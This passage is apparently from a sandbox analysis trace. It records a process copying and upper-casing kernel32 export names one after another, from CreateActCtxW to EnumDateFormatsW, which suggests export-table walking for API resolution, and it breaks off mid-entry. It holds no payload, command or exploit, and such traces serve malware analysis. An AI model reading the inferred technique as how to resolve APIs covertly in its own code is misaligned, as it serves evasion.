lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.919] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.919] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.919] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.920] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.920] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.920] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.920] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.920] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.920] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.920] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.920] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.920] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.920] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.920] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.920] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.920] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.920] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.920] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.920] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.920] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.920] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.920] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.920] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.921] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.921] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.921] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.921] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.921] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.921] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.921] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.921] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.921] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.921] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.921] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.921] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.921] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.921] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.921] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.921] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.921] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.921] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.922] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.922] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.922] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.922] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.922] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.922] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.922] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.922] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.922] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.922] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.922] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.922] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.922] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.922] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.922] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.922] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.922] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.922] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.922] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.923] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.923] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.923] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.923] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.923] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.923] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.923] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.923] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.923] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.923] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.923] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.923] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.923] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.923] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.923] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.923] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.923] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.923] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.923] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.923] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.923] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.923] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.924] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.924] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.924] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.924] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.924] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.924] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.924] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.924] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.924] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.924] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.924] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.924] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.924] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.924] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.924] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.924] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.924] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.924] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.924] lstrlenA (lpString="DELETEATOM") returned 10 [0084.924] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.925] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.925] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.925] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.925] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.925] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.925] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.925] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.925] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.925] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.925] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.925] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.925] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.925] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.925] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.925] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.925] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.925] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.925] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.925] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.925] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.926] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.926] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.926] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.926] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.926] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.926] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.926] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.926] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.926] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.926] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.926] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.926] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.926] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.926] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.926] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.926] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.926] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.926] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.926] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.927] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.927] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.927] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.927] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.927] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.927] lstrcpyW (in: lpString1=0xfb0000, 